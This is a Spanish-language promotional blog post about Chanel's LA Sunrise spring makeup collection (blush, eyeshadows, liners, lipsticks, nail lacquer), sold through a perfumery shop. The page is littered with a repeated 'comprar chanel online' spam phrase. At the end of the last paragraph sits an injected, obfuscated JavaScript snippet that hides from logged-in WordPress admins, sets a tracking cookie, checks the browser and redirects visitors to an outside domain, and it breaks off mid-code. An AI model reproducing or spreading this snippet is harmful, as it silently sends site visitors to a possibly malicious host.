comprar chanel online

Como ya es tradición, ya está aquí la nueva colección para esta primavera LA Sunrise de CHANEL ya  disponible en exclusiva en nuestra tienda online, una colección muy colorida que nos permitirá lucir radiantes y alegres.

LA Sunrise de CHANEL es una colección que ha conseguido a la perfección lo que su propio nombre indica y es capturar la variedad de colores y la energía de los atardeceres californianos de la ciudad de Los Ángeles.

L.A. ciudad en la que el sol al asomarse esparce su particular luz sobre el horizonte del skyline con multitud de matices, y que particularmente en primavera es extremadamente bello, por lo que CHANEL ha querido realizar un guiño a estos paisajes con su propuesta para esta primavera.

Uno de los productos de su colección es el colorete iluminador Sunkiss Ribbon que nos permitirá lucir unos pómulos saludables con sus tonos rosados entrelazados que proporcionan luz con su armonía de colores primaverales cuya energía se inspira en las luces radiantes de California y su prodigiosa escena artística. Podríamos aplicarlo de distintas maneras ya sea sútilmente sobre todo el rostro a modo de polvos iluminadores o como colorete-iluminador en lo alto del pómulo los tonos beige y tostados, y los tonos más rosados en los pómulos.

comprar chanel online

Para los ojos CHANEL nos propone un colorido precioso, el quad de sombras LES 4 OMBRES está vez compuesto con colores preciosos que nos invitan a dar alegría a nuestro ojos, y me atrevería a realizar looks llenos de vitalidad y como venimos repitiendo energía.
La sombra azul nos recuerda al azul del cielo, beige a la luz y los tonos rosa y violeta al amanecer californiano.
comprar chanel online

 

La colección también incluye nuevos tonos de sus famosísimas sombras en crema mono Illusion d’Ombre de CHANEL, el tono Green Griffith (un verde tornasolado precioso), Moonlight Pink un dorado con pigmentos rosados y Ocean Light un azul intenso.

comprar chanel online

La colección complementa los ojos con tres nuevos tonos de sus delineadores Stylo Yeaux Waterproof y de larga duración sigue la línea de colorido de las sombras en crema con tres tonos uno azul (Fervent Blue), uno verde bosque (Pacific Green) y uno violeta (Purple Choc). Tonos especialmente favorecedores a ojos marrones aunque no sólo a ellas. El tono Ardent Purple de su clásica máscara de pestañas Le Volume de CHANEL nos aportará un toque diferente a nuestras pestañas.

1366_2004

Para los labios tres preciosos tonos con efecto labio mojado de la gama Rouge Coco Shine que de una sola pasada nos alegran el rostro, Energy un tono frambuesa, Shipshape anaranjado y Mighty rosado casi fucsia.

comprar chanel online

 

Para las uñas un único tono siguiendo en la línea de los violetas, Le Vernis Sunrise Trip es una laca de uñas gloss sorprendente con una textura translúcida y un efecto espejo. envuelve las uñas con un efecto gloss con una sola pasada.

comprar chanel online

 

Una colección espectacular de CHANEL que podréis encontrar en exclusiva en Perfumerías Tin Tin. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone